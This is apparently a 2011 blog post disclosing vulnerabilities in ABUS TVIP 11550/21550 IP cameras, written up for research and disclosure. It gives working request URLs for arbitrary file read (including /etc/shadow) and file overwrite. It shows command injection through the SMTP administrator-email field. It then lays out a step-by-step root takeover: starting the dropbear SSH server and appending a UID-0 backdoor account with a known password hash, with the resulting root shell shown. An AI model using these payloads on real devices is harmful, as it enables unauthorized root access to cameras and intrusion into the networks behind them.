Pages

13 October 2011

ABUS TVIP 11550/21550 File Read / File Upload / Command Exec

Title  : ABUS TVIP 11550/21550 Multiple vulnerabilities (and possibly other ABUS cams)
Author : Marco van Berkum

- Summary
- Arbitrary file read
- Arbitrary file upload
- Arbitrary command excution (input validation bug)
- How it's totally compromised including ssh root login.

- Summary

The ABUS 11550 and 21550 are IP Webcams that can be configured via a
webinterface.
While experimenting multiple vulnerabilities where discovered that give
rootaccess
to the Operating System, debian-linux, of the camera. The webserver of the
camera is
BOA and runs as root.

Although these vulnerabilities can ONLY be exploited  when logged in as
admin, they
can still be considered critical since the camera can be used to gain
access to the
network behind it. I did not find a way past the login screen without
proper credentials (yet).

- Arbitrary file read

When logged in as admin its possible to read any file on the filesystem since
the webserver is running as root.

http://ipcamera/cgi-bin/admin/fileread?READ.filePath=/etc/shadow

- Arbitrary file upload

Similar to the fileread CGI there also is a filewrite CGI that can
(over)write any
file.

http://ipcamera/cgi-bin/admin/filewrite?SAVE.filePath=/tmp/file%26SAVE

- Arbitrary command execution (input validation bug)

The camera has several htmlforms to configure services such as a FTPclient
and
a SMTPclient. These are used to notify users and upload videos when the
camera's motion detection detects movement. These htmlforms can be used to
execute
arbitrary commands as root. I've found bugs in the SMTP and FTP forms but
probably
other forms will contain the same bug (unchecked).

Exploit:
In the configuration -> smtp general part is a webform where an
administrator's
emailadress can be filled out (Administrator e-Mail address).
The form lacks checking metacharacters such as ;, | and `.
When a test email from this form is sent the webinterface executes ssmtp -t
.
So it is possible to 'break' the commandline by using `ls` for instance.
After
submitting
the command via the 'testbutton' this will be the output:

smtp: Connect to host

smtp: MAIL FROM:
SMTP server error
................SMTP Test Failed...........

Which means we are situated in a directory that contains a backup directory.

`pwd` also works

smtp: Connect to host

smtp: MAIL FROM:
SMTP server error
................SMTP Test Failed...........

Unfortunately this only outputs the first line of the commandline output.
But, we can work around this :)

The system also contains a System Log function that shows output of the
systemlog.
Now, if we want a little more output than just the first line, for instance
"ls /" we can do it by filling out `ls /|logger` which sends the output
to the system logfile. Which can then be viewed from the webinterface.

Oct  8 14:35:15  root: bin
Oct  8 14:35:15  root: dev
Oct  8 14:35:15  root: etc
Oct  8 14:35:15  root: include
Oct  8 14:35:15  root: init
Oct  8 14:35:15  root: lib
Oct  8 14:35:15  root: linuxrc
Oct  8 14:35:15  root: mnt
Oct  8 14:35:15  root: opt
Oct  8 14:35:15  root: proc
Oct  8 14:35:15  root: root
Oct  8 14:35:15  root: sbin
Oct  8 14:35:15  root: smtp_test.sh
Oct  8 14:35:15  root: sys
Oct  8 14:35:15  root: tag_replace.sh
Oct  8 14:35:15  root: tmp
Oct  8 14:35:15  root: usr
Oct  8 14:35:15  root: var
Oct  8 14:35:15  root: web

Getting the correct commandline output can also be obtained by redirecting
it to a readble file on de webserver itself by doing `ls -alR
/>/web/html/lsoutput.txt`
It can then be accessed by the url http://ipcamera/lsoutput.txt

- How it's totally compromised including ssh root login.

I did it in a few steps. First did a `ls -alR/>/web/html/lsoutput.txt` to
see what was on the filesystem and noticed that dropbear is available on the
system. Dropbear is a SSHserver/Client :)
So, I started it with the `/etc/dropbear/dropbear` command.

Then I took a look at the /etc/shadowfile and noticed that user root had
no password,
so ssh'ing in was not an option, yet. So had to create a user, did it the
following way:

`echo "test:x:0:0:test:/tmp:/bin/sh">>/etc/passwd`
and
`echo
"test:$1$/DqZS5Cm$PUeCTPpYIrGQnxsZtsfDY1:12963:0:99999:7:::">>/etc/shadow`

So, now we can login as user test with password test. User test has UID 0,
thus root.

test@ipcamera's password:
Welcome to

_____    __      ___       __     ___       _     _    _
|  ___|  /      / __     /     |  _     /       / /
| |___  / /   | /__   / /   | |  |  / /     V /
|  ___|| |__| | |  _   / | |__| | | | | | | |__| |    /
| |    |  __  | | |    |  __  | | |_/ / |  __  |   | |
|_|    |_|  |_| |_|   \_|_|  |_| |___ /  |_|  |_|   |_|

For further information check:
http://www.GM.com/



BusyBox v1.1.3 (2010.05.10-11:54+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

[test]#

Voila ;)

Also, its possible to mount a samba or nfsshare via the webinterface and
copy files
that way.

Just my two cents
Marco van berkum

0 comments: